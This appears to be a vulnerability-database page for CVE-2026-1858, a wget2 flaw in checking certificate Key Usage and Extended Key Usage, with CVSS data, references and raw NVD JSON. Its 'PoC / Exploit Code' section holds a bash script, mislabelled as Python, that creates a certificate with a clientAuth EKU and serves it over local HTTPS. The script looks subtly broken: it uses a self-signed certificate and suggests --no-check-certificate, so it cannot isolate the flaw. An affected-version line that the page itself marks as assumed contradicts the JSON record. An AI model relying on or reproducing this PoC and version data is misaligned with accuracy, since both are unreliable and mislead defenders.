CVE-2026-1858

Description

wget2 accepts a server certificate with incorrect Key Usage (KU) or Extended Key Usage (EKU). If the attackers compromise a certificate (with the associated private key) issued for a different purpose, they may be able to reuse it for TLS server authentication.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:gnu:wget2:*:*:*:*:*:*:*:* - VULNERABLE

wget2 < 2.1.0 (假设版本，具体请参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# PoC for CVE-2026-1858: wget2 Incorrect Key Usage Acceptance
# This script generates a certificate with 'clientAuth' EKU (instead of 'serverAuth')
# and sets up a test HTTPS server. If wget2 connects without error, the vuln is confirmed.

# 1. Generate Private Key
openssl genrsa -out malicious.key 2048

# 2. Create Configuration with incorrect EKU (Client Auth)
cat > malicious.cnf <<EOF
[req]
distinguished_name = req_distinguished_name
req_extensions = v3_req
[req_distinguished_name]
commonName = www.example.com
[v3_req]
keyUsage = digitalSignature, keyEncipherment
extendedKeyUsage = clientAuth  # Incorrect EKU for a Server
EOF

# 3. Generate Self-Signed Certificate
openssl req -new -x509 -key malicious.key -out malicious.crt -days 365 -config malicious.cnf

# 4. Start a simple HTTPS server using the malicious cert (Python 3)
echo "Starting malicious server on port 8443..."
python3 - <<PY_SCRIPT
import http.server
import ssl
import socketserver

context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain('malicious.crt', 'malicious.key')

httpd = socketserver.TCPServer(('0.0.0.0', 8443), http.server.SimpleHTTPRequestHandler)
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
print("Server running. Test with: wget2 https://localhost:8443 --no-check-certificate")
print("If wget2 connects WITHOUT --no-check-certificate, the vulnerability is exploited.")
httpd.serve_forever()
PY_SCRIPT

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1858
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1858
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1858/
[4] VulDB https://vuldb.com/cve/CVE-2026-1858
[5] https://www.tenable.com/security/research/tra-2026-37

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1858", "sourceIdentifier": "[email protected]", "published": "2026-04-29T21:16:20.513", "lastModified": "2026-05-05T02:47:29.463", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "wget2 accepts a server certificate with incorrect Key Usage (KU) or Extended Key Usage (EKU). If the attackers compromise a certificate (with the associated private key) issued for a different purpose, they may be able to reuse it for TLS server authentication."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:wget2:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.2.1", "matchCriteriaId": "7059A7C4-12BD-4BA5-B6A7-642161B8DDA2"}]}]}], "references": [{"url": "https://www.tenable.com/security/research/tra-2026-37", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}